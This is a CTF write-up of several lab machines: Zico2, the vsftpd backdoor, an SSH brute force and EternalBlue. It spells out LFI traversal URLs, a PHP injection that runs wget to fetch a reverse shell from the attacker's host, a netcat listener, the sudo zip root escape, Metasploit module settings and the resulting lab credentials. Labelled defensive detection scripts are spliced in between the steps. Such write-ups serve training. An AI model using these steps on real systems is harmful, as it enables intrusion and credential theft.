Metared Stage4 Write-ups 2nd Post
Credit: Metared

This post covers the remaining challenges I managed to complete during this CTF.


"Zico's Shop: A Boot2Root Machine intended to simulate a real world scenery - Description: Zico is trying to build his website but is having some trouble in choosing what CMS to use. After some tries on a few popular ones, he decided to build his own. Was that a good idea? Goal: Get root and read the flag file Type the text of the flag file."


The challenge provided a VM as an OVA file. I downloaded it and ran it in VirtualBox. As always with these boxes, the first step is an Nmap scan; since I wasn't sure of the IP address, I scanned the whole network to see which hosts were up:

nmap -sV -sC 10.38.1.0/24

-sC runs the default NSE scripts

-sV enumerates service versions

Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-15 03:49 EST
Nmap scan report for 10.38.1.115
Host is up (0.0030s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
|   2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_  256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp  open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Zico's Shop
|_http-server-header: Apache/2.2.22 (Ubuntu)
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          45315/udp6  status
|   100024  1          47062/tcp6  status
|   100024  1          55570/tcp   status
|_  100024  1          59585/udp   status
MAC Address: 08:00:27:D2:27:D0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Please forgive the formatting. We can see the box has a web server on port 80, SSH on port 22 and rpcbind on port 111. Nothing too obvious here, so let's enumerate the website:

gobuster dir -u https://10.38.1.115 --wordlist /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -x pdf,txt,sh,py,js,html,php


I like gobuster as a command line tool; dirbuster would be just as useful.

/img                  (Status: 301) [Size: 308] [--> https://10.38.1.115/img/]
/index.html           (Status: 200) [Size: 7970]
/index                (Status: 200) [Size: 7970]
/tools                (Status: 200) [Size: 8355]
/tools.html           (Status: 200) [Size: 8355]
/view.php             (Status: 200) [Size: 0]
/view                 (Status: 200) [Size: 0]
/css                  (Status: 301) [Size: 308] [--> https://10.38.1.115/css/]
/js                   (Status: 301) [Size: 307] [--> https://10.38.1.115/js/]
/vendor               (Status: 301) [Size: 311] [--> https://10.38.1.115/vendor/]
/package              (Status: 200) [Size: 789]
/less                 (Status: 301) [Size: 309] [--> https://10.38.1.115/less/]
/server-status        (Status: 403) [Size: 292]
/dbadmin              (Status: 301) [Size: 312] [--> https://10.38.1.115/dbadmin/]


We have a few interesting pages here; for the sake of this post we need view.php and the dbadmin directory. After some googling, the view page can be vulnerable to LFI, so let's try that:

https://10.38.1.115/view.php?page=../../../../etc/passwd

and it works:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
ntp:x:103:108::/home/ntp:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
statd:x:105:65534::/var/lib/nfs:/bin/false
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
zico:x:1000:1000:,,,:/home/zico:/bin/bash

After a lot of messing around with this it was evident we needed something else, so let's go over to the dbadmin page. After navigating there, click on test_db.php:

https://10.38.1.115/dbadmin/test_db.php

This brings up a login console requiring only a password. Trying some obvious ones (password, admin, 12345, etc.), the password turns out to be admin. Once in, we find password hashes in the user table: root:653F4B285089453FE00E2AAFAC573414 and zico:96781A607F4E9F5F423AC01F0DAB0EBD. Searching the hashes on https://crackstation.net/ gives root:34kroot34 and zico:zico2215@. I tried to SSH with these, as people often reuse passwords, but it didn't work.

However, the login console also tells us the version is phpLiteAdmin v1.9.3, and if we google this version we find it is vulnerable to PHP code injection according to https://www.exploit-db.com/exploits/24044, which includes a PoC explaining how to exploit it. We have LFI and a way to create PHP code, so let's get a reverse shell. There is one at https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php; just make sure to change the IP and port to your IP and whatever port you will be setting the netcat listener up on. First we have to get the reverse shell onto the box, so we use Python to serve the file over HTTP:

python3 -m http.server 8080

Then click 'create new database' and name it shell.php; it's important to include .php as this is what gives us execution. Once the database is created, click 'create new table on database', put whatever you like under name, set number of fields to 1 and click go. We will be directed to the 'new table' tab; the field column is where our PHP code goes, and make sure the 'Type' field is set to text. The reverse shell on my system is called rev2.php:

<?php system('wget http://$IP:8080/rev2.php');?>

The Python server logs a 200, so it seems it went well. Let's set up a netcat listener:

nc -lnvp 4444

-l listen for incoming connections

-v verbose output

-n do not do any name or service lookups on any addresses, hostnames, or ports

-p specify the port to listen on

Click create, and then we need to execute it, so let's go back to view.php where we found the LFI vulnerability:

https://10.38.1.115/view.php?page=../../../../usr/databases/shell.php

When we navigate to this page we get a reverse shell on nc:

$ whoami

www-data
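The two requests above (the /etc/passwd read and the inclusion of shell.php from the phpLiteAdmin database directory) are both the same bug: view.php passes the page parameter straight into an include. The following is an added example, not code from the write-up or from the Zico's Shop application, showing the defender's side: how a page loader should map a ?page= value to a file (exact allowlist plus a normalised-path containment check), and a small detector that runs the same logic over Apache access-log lines. The /var/www/pages directory, the ALLOWED_PAGES set and the log lines are all constructed for the example.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Hypothetical layout for this example: the only files the viewer may include
# live under PAGES_DIR and are named by an exact entry in ALLOWED_PAGES.
PAGES_DIR = "/var/www/pages"
ALLOWED_PAGES = {"index", "tools"}

# Raw or percent-encoded "../" and "..\" sequences.
TRAVERSAL = re.compile(r"\.\.(/|\\|%2f|%5c)", re.IGNORECASE)
# Apache combined log: client IP, then the request line.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def resolve_page(page_param, pages_dir=PAGES_DIR, allowed=ALLOWED_PAGES):
    """Map a ?page= value to the file the application may include.

    Returns the absolute path, or None when the value is not an exact
    allowlisted name. The allowlist alone is sufficient; the containment
    check is defence in depth in case the allowlist is ever relaxed."""
    if page_param is None:
        return None
    name = unquote(page_param)
    if name not in allowed:
        return None
    candidate = posixpath.normpath(posixpath.join(pages_dir, name + ".php"))
    if not candidate.startswith(pages_dir.rstrip("/") + "/"):
        return None
    return candidate


def flag_lfi_requests(log_lines):
    """Return (client_ip, page_value, reason) for every request whose ?page=
    value contains a traversal sequence or is not an allowlisted page."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        # parse_qs percent-decodes once; decode again to catch double encoding.
        for value in parse_qs(urlsplit(target).query).get("page", []):
            decoded = unquote(value)
            if TRAVERSAL.search(value) or TRAVERSAL.search(decoded):
                hits.append((ip, value, "directory traversal"))
            elif resolve_page(decoded) is None:
                hits.append((ip, value, "not an allowlisted page"))
    return hits


# Constructed sample access-log lines modelled on the requests in the write-up.
SAMPLE_ACCESS_LOG = [
    '10.38.1.20 - - [15/Nov/2022:03:55:01 -0500] "GET /view.php?page=tools HTTP/1.1" 200 8355 "-" "Mozilla/5.0"',
    '10.38.1.20 - - [15/Nov/2022:03:55:09 -0500] "GET /view.php?page=../../../../etc/passwd HTTP/1.1" 200 1812 "-" "Mozilla/5.0"',
    '10.38.1.20 - - [15/Nov/2022:04:02:41 -0500] "GET /view.php?page=..%2F..%2F..%2F..%2Fusr%2Fdatabases%2Fshell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.38.1.21 - - [15/Nov/2022:04:03:00 -0500] "GET /index.html HTTP/1.1" 200 7970 "-" "curl/7.85"',
    '10.38.1.21 - - [15/Nov/2022:04:03:05 -0500] "GET /view.php?page=about HTTP/1.1" 200 0 "-" "curl/7.85"',
]

if __name__ == "__main__":
    for ip, value, reason in flag_lfi_requests(SAMPLE_ACCESS_LOG):
        print(f"{ip}  page={value!r}  {reason}")
```

The point of the exact-name allowlist is that neither the traversal sequence nor the .php-in-an-unexpected-directory trick matters any more: the parameter is never used as a path fragment, only as a dictionary key. The detector reports the decoded value, because parse_qs already applies one round of percent-decoding.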

Let's stabilise the shell with Python; it's not necessary, but I prefer it:

python -c "import pty; pty.spawn('/bin/bash');"

After a lot of looking around I found the directory /home/zico/wordpress, which contains a wp-config.php file. If we cat this out we get the following:

<?php
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'zico');

/** MySQL database username */
define('DB_USER', 'zico');

/** MySQL database password */
define('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');

Here we can see a password for the database, and passwords are often reused; from /etc/passwd we know there is a user named zico. We know SSH is open, so let's try:

ssh zico@10.38.1.115

password = sWfCsfJSPV9H3AmQzw8

This works and we are in via SSH, but we need to privesc to root to read the flag. Start simple:

sudo -l

-l, --list    If no command is specified, list the allowed (and
              forbidden) commands for the invoking user (or the user
              specified by the -U option) on the current host.  A
              longer list format is used if this option is specified
              multiple times and the security policy supports a
              verbose output format.

This gives us two binaries that can be run as root with no password. I chose zip; head over to https://gtfobins.github.io/ to see what can be done with it and run the following:

TF=$(mktemp -u)

sudo zip $TF /etc/hosts -T -TT 'sh #'

sudo rm $TF

This gives you root:

$ whoami

root

Go to the root directory and cat out the flag file.

Flag = ROOOOT!You did it! Congratz!Hope you enjoyed!
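The root step above only worked because sudoers granted zip as root with NOPASSWD, and zip can hand its caller a shell. The following is an added example, not part of the write-up, of the check a sysadmin would run before shipping a sudoers file: parse the entries, and flag any NOPASSWD rule whose command is ALL or whose binary is on a list of programs known (per GTFOBins) to break out to a shell. The sudoers content and the SHELL_ESCAPE_BINARIES set are constructed for the example; the set is a small illustrative subset, not the full GTFOBins list.

```python
import posixpath
import re

# Illustrative subset (not exhaustive) of binaries that can give the caller
# an interactive shell or arbitrary command execution when run as root.
# GTFOBins (https://gtfobins.github.io/) maintains the full list.
SHELL_ESCAPE_BINARIES = {
    "zip", "tar", "vim", "vi", "less", "more", "find", "awk",
    "perl", "python", "python3", "env", "sh", "bash",
}

# user  host=(runas) [TAG: ...] command[, command...]
SUDOERS_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Return a list of dicts for each user specification in a sudoers file.
    Comments, blank lines and Defaults lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = SUDOERS_RE.match(line)
        if not m:
            continue
        entries.append({
            "user": m.group("user"),
            "host": m.group("host"),
            "runas": m.group("runas"),
            "tags": set(re.findall(r"(\w+):", m.group("tags"))),
            "commands": [c.strip() for c in m.group("cmds").split(",")],
        })
    return entries


def audit_sudoers(text):
    """Return (user, command, reason) for every NOPASSWD rule that grants
    either ALL commands or a binary with a known shell escape."""
    findings = []
    for e in parse_sudoers(text):
        if "NOPASSWD" not in e["tags"]:
            continue
        for cmd in e["commands"]:
            binary = cmd.split()[0]
            if binary == "ALL":
                findings.append((e["user"], cmd, "NOPASSWD for ALL commands"))
            elif posixpath.basename(binary) in SHELL_ESCAPE_BINARIES:
                findings.append((e["user"], cmd,
                                 "NOPASSWD on a binary with a known shell escape"))
    return findings


# Constructed sample sudoers file; the zico line mirrors the kind of rule
# that made the privesc in the write-up possible.
SAMPLE_SUDOERS = """\
# constructed example
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
zico    ALL=(root) NOPASSWD: /usr/bin/zip, /usr/bin/tar
www-data ALL=(root) NOPASSWD: /usr/sbin/service apache2 restart
backup  ALL=(ALL) NOPASSWD: ALL
"""

if __name__ == "__main__":
    for user, cmd, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{user:10} {cmd:40} {reason}")
```

The www-data rule is not flagged: it is NOPASSWD, but the command is pinned to a specific service invocation with fixed arguments, which is the shape a least-privilege sudo rule should have. The fix for the zico line is to drop NOPASSWD or, better, not to grant an archiver as root at all.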

I learned after the CTF was over that this box is actually on VulnHub, so if you enjoyed reading this, have VirtualBox and want to try it yourself, go to https://www.vulnhub.com/entry/zico2-1,210/, download the OVA and enjoy!


"Getting FTP access you will find the flag - Get access to the virtual machine from the FTP service there you will find the flag."

Download the OVA and run it in VirtualBox. After an nmap scan:

nmap -sC -sV 10.38.1.111

we find the FTP service is running on port 21. Let's see what happens if we scan it with the Nmap scripting engine:

nmap --script=vuln -p 21 10.38.1.111

It reports the service as vulnerable to vsftpd_234_backdoor, so let's fire up Metasploit and see if this works:

msfconsole

and we can see it does indeed have that module:

use exploit/unix/ftp/vsftpd_234_backdoor

set payload payload/cmd/unix/reverse

then set RHOSTS to the vulnerable machine (10.38.1.111 in my case) and LHOST to your own IP, and that's it: we get back a reverse shell and can cat the flag.txt file from there.


"Figure out the hidden message in the VM - From the virtual machine it is required to obtain the credentials to access by ssh, the user has a country of culinary destination as a name. I leave you the dictionary."

We have another OVA to download, but it is the same machine as the FTP one. So we can cat /etc/passwd to list the users and make sure we have the correct one; we see peru as a user, so we can be sure. Given that this was the Peru CTF, that would also have led to the same conclusion. So let's brute-force the SSH login using hydra:

hydra -l peru -P userlist.txt ssh://10.38.1.113

-l specifies a single user (-L would specify a user list)

-P specifies a password list (-p would specify a single password)

and we get the answer "Cev1chePeru4no", which is the flag.


Flag = Cev1chePeru4no
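A hydra run like the one above is loud on the target: every guess lands in the SSH server's auth log as a "Failed password" line from one source within a few seconds. The following is an added example, not part of the write-up, of the detection logic a defender would run over those lines: a per-source sliding window over failed logins that raises an alert once a threshold is crossed, plus a second pass that flags a successful login from a source that had already tripped the alert (the case where the brute force worked). The log lines are constructed for the example, modelled on the OpenSSH syslog format.

```python
import re
from collections import defaultdict
from datetime import datetime

# OpenSSH syslog lines: "Mon DD HH:MM:SS host sshd[pid]: Failed password for [invalid user] NAME from IP port N ssh2"
FAILED = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)
ACCEPTED = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Accepted \w+ for "
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def _ts(text, year):
    # syslog timestamps carry no year, so the caller supplies one.
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")


def parse_failures(lines, year=2022):
    """Return (timestamp, source_ip, username) for each failed password line."""
    events = []
    for line in lines:
        m = FAILED.match(line)
        if m:
            events.append((_ts(m.group("ts"), year), m.group("ip"), m.group("user")))
    return events


def detect_bruteforce(lines, threshold=5, window_seconds=60, year=2022):
    """Sliding window per source IP. Returns {ip: summary} for every source
    with at least `threshold` failures inside any `window_seconds` span."""
    per_ip = defaultdict(list)
    alerts = {}
    for ts, ip, user in sorted(parse_failures(lines, year)):
        window = per_ip[ip]
        window.append((ts, user))
        # Drop failures that have aged out of the window.
        while (ts - window[0][0]).total_seconds() > window_seconds:
            window.pop(0)
        if len(window) >= threshold:
            alerts[ip] = {
                "first": window[0][0],
                "last": ts,
                "attempts": len(window),
                "users": sorted({u for _, u in window}),
            }
    return alerts


def successful_after_bruteforce(lines, alerts, year=2022):
    """Return (ip, user) for each accepted login from a source that had
    already crossed the brute-force threshold: the guess succeeded."""
    hits = []
    for line in lines:
        m = ACCEPTED.match(line)
        if not m:
            continue
        ip = m.group("ip")
        if ip in alerts and _ts(m.group("ts"), year) >= alerts[ip]["first"]:
            hits.append((ip, m.group("user")))
    return hits


# Constructed sample auth.log excerpt: a short password-guessing burst against
# the peru account that ends in a successful login, plus one unrelated failure.
SAMPLE_AUTH_LOG = [
    "Nov 15 04:10:01 vm sshd[2201]: Failed password for peru from 10.38.1.20 port 51200 ssh2",
    "Nov 15 04:10:02 vm sshd[2203]: Failed password for peru from 10.38.1.20 port 51201 ssh2",
    "Nov 15 04:10:02 vm sshd[2205]: Failed password for peru from 10.38.1.20 port 51202 ssh2",
    "Nov 15 04:10:03 vm sshd[2207]: Failed password for invalid user admin from 10.38.1.20 port 51203 ssh2",
    "Nov 15 04:10:04 vm sshd[2209]: Failed password for peru from 10.38.1.20 port 51204 ssh2",
    "Nov 15 04:10:05 vm sshd[2211]: Failed password for peru from 10.38.1.20 port 51205 ssh2",
    "Nov 15 04:10:06 vm sshd[2213]: Accepted password for peru from 10.38.1.20 port 51206 ssh2",
    "Nov 15 04:15:30 vm sshd[2301]: Failed password for zico from 10.38.1.30 port 40000 ssh2",
]

if __name__ == "__main__":
    alerts = detect_bruteforce(SAMPLE_AUTH_LOG)
    for ip, info in alerts.items():
        print(f"{ip}: {info['attempts']} failures {info['first']} .. {info['last']} users={info['users']}")
    for ip, user in successful_after_bruteforce(SAMPLE_AUTH_LOG, alerts):
        print(f"{ip}: successful login as {user} after brute-force burst")
```

A threshold of five failures in a minute is deliberately low for a lab; on a real host, tune it against normal traffic, and pair the detection with the usual mitigations (key-based auth, fail2ban-style lockouts, and no dictionary passwords on accounts named after the event).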

"Access the desktop - Enter the desktop of this machine and look for the flag."

We are given a Windows 7 OVA to download this time. When we run it, it just brings us to a login screen. Let's attack it!

Running nmap shows that it is Windows 7 with SMB running, which makes me think of EternalBlue, as I have covered this machine a few times in courses I took. So let's try that:

Fire up Metasploit again with msfconsole; after some googling, EternalBlue is known as MS17-010 on Metasploit.

search ms17-010

Use the first option (option 0):

use 0

Set RHOSTS to the vulnerable machine and LHOST to your own IP, then type run and hit enter. That's it: a meterpreter shell with root this time, no privesc necessary. Just navigate over to the desktop; this is Windows, so use type instead of cat:

type flag.txt

and that's it!


Thank you for taking the time to read this, I hope you enjoyed it!
